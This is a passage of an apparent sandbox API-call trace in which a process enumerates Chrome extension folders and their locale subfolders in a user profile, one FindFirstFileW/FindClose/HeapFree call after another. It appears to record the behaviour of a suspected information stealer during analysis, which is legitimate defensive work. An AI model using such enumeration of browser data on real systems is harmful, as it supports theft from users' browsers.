lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.363] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.364] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.364] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.364] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.364] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.364] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0157.364] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.364] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.365] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.365] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.365] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.366] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.366] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.366] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.366] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.366] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.367] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.367] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.367] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.368] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.368] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.368] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.368] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.368] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.368] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.369] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.369] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.369] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.369] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.369] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.369] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.370] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.370] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.370] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.370] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.372] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.372] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.372] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.372] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.372] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.373] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.373] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.373] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.373] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.373] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.373] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.374] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.374] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.374] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.374] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.374] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.375] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.375] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.375] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.375] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.375] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.376] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.376] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.376] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.376] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.376] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.377] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.377] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.377] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.377] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.377] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.378] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.378] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.378] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.378] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.378] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.378] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.379] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.379] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.379] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.379] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.379] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.380] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.380] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.380] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.380] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.451] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.451] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.452] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.452] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.452] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.452] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0157.452] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.452] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.453] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.453] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.453] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.453] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.453] 